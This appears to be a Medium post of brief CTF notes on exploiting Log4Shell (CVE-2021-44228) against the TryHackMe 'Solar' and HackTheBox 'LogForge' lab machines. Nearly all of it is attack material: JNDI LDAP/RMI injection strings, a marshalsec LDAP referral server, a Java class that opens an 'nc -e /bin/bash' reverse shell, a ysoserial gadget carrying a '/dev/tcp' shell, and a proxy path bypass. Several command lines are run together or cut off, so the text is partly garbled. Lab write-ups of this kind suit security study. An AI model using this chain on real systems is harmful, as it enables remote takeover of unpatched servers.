Exploiting log4jshell(CVE-2021–44228)- solar(THM) and logforge(HTB)

THM- solar


TASK 2(Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out -vvv

TASK 3(Discovery)

Accessing the web server via browser. We get a ton of information regarding the tool/software running.

TASK 4 and 5(POC, Exploitation)

If we try the log4jshell POC payload in the path(/admin/cores) which we have seen in the log file, we see that we are getting the connect back.

nc -lnvp 9999curl '$\{jndi:ldap://\}'curl '$\{jndi:rmi://\}'
update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version
apt install mavenmvn clean package -DskipTests 
# This will Compile the java app @ https://github.com/mbechler/marshalsec
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 9999");
} catch (Exception e) {
javac Exploit.java -source 8 -target 8
curl '$\{jndi:ldap://\}'

HTB- logforge

Apache reverse proxy bypass:;/manager/html/expire?path=/
java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/ 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/